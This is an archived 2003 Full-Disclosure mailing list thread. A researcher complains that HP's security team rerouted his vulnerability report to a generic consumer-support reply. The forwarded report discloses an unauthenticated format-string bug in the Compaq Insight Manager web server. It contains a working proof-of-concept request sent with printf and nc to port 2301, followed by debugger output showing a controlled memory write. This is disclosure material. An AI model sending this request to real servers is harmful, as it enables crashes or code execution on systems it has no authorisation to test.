Full Disclosure mailing list archives
Re: FW: Please investigate (KMM6769685V17014L0KM)
From: mcw () wcd se
Date: Mon, 4 Aug 2003 17:56:55 +0200 (CEST)
Not for security-alert () hp com. Please make sure appropriate HP organization replies to the customer: mcw () wcd se Yours truly, SOFTWARE SECURITY RESPONSE TEAM (SSRT) Hewlett-Packard Company HP Services
..... Okay, so this formatstring bug in WBEM Web server is not a Security issue? You can test it on your own, nearest production server or client, no matter what box you test this on, only one thing, it _must_ have Compaq Insight Manager installed. (Hint: You don't need any login/password, as this issue is in the Web server) I give a shit about this bug, i was only informing you about it, but if this sick mailing continues every time i report a SECURITY issue i have found to you, i'll never bother you againg and only post it to Full-Disclosure list.. (Same crap as last time... gah) Have a nice day /bashis
Dear Compaq Customer, It would help me to provide you with an accurate solution, if you could provide the following additional details: * The name and model of your Compaq product, for example: Presario 5400. * The hardware or software that has been installed recently. * The serial number. The serial number can be found on a sticker attached to the side of your computer. * The exact error message you received and the events that led to the error (i.e., whether the error message was received after a program was installed.) * The operating system installed on the computer (for example: Windows 98.) With the above information, I will be able to investigate the issue further and provide you with a solution. Thank you for taking the time to contact us. Please reply if I can be of further assistance. Regards, Suresh Babu Sharath HP Consumer eSupport For additional or future service assistance, you can post your question to the Customer Communities at: http://www.compaq.com/communities "Our advice is strictly limited to the question(s) asked and is based on the information provided to us. HP does not assume any responsibility or liability for the advice given and shall not be liable for any direct, indirect, special, incidental or consequential damages in connection with the use of this information. Always back up your data. For more information, including technical information updates, please visit our Web site at http://www.hp.com/go/support." Original Message Follows: ------------------------- This message has been rerouted to you by the HP.COM email router. If this message has been sent to you in error, please forward back to the email router mailbox at REROUTER,HPCOM per HP email directory or HPCOM REROUTER per CPQ email directory. Original message follows: ------------------------- Not for security-alert () hp com. Please make sure appropriate HP organization replies to the customer: mcw () wcd se Yours truly, SOFTWARE SECURITY RESPONSE TEAM (SSRT) Hewlett-Packard Company HP Services ------- Forwarded Message Date: Sun, 03 Aug 2003 17:03:43 +0200 From: mcw () wcd se To: security-alert () hp com cc: full-disclosure () lists netsys com Subject: formatstring bug in Compaq HTTP Servers Hi there There is a formatstring bug in Compaq HTTP Servers. [in <!.DebugSearchPaths>?Url=> requests] The HTTP server runs with LocalSystem account. Versions: All versions i have tested had this formatstring bug. To be shure that it wasn't allready fixed, i downloaded this new version.. Insight Management Agent Version: 5.00 H (01/17/2003) http://www29.compaq.com/falco/sp_detail.asp?Model=4214&Div=2&Os=93&Softw areVer= 17022 Request: $ printf "GET /<\x21.DebugSearchPaths>?Url=`perl -e 'print "A"x14'`BBBB`perl -e 'print ".%%x"x1208'`%%n> HTTP/1.0\n\n" | nc 192.168.235.131 2301 Result: 0:005> g (9a8.934): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=42424242 ebx=0000006e ecx=000012eb edx=00000200 esi=00b440c0 edi=00000800 eip=780127a8 esp=010287f8 ebp=01028a50 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010246 MSVCRT!setvbuf+65d: 780127a8 8908 mov [eax],ecx ds:0023:42424242=???????? *** WARNING: Unable to verify checksum for C:\PROGRA~1\Compaq\COMPAQ~1\CPQWEB~1 \CpqHMMO.dll *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:PROGRA~1\Compaq \COMPAQ~1\CPQWEB~1\CpqHMMO.dll - Have a nice day /bashis ------- End of Forwarded Message
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Re: FW: Please investigate (KMM6769685V17014L0KM) mcw (Aug 04)